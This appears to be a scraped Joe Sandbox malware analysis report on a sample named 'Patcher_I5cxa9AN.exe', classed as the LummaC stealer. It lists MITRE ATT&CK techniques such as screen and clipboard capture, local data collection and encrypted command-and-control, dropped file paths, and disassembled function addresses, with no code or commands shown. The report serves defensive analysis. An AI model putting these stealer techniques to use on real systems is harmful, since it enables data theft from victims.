Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Patcher_I5cxa9AN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Patcher_I5cxa9AN.exe.log

C:\Users\user\AppData\Roaming\gdi32.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Patcher_I5cxa9AN.exe

Function 6CDE3170 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 286
COMMON

Function 026909EA Relevance: .1, Instructions: 133
COMMON

Function 6CDE7268 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CDE7318 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CDED1BF Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 6CDE7161 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CDED7BC Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 02690FE0 Relevance: 1.6, APIs: 1, Instructions: 86
libraryCOMMON

Function 02690FE8 Relevance: 1.6, APIs: 1, Instructions: 81
libraryCOMMON

Function 6CDEE17A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Function 02691478 Relevance: 1.3, APIs: 1, Instructions: 76
COMMON

Function 02691480 Relevance: 1.3, APIs: 1, Instructions: 73
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre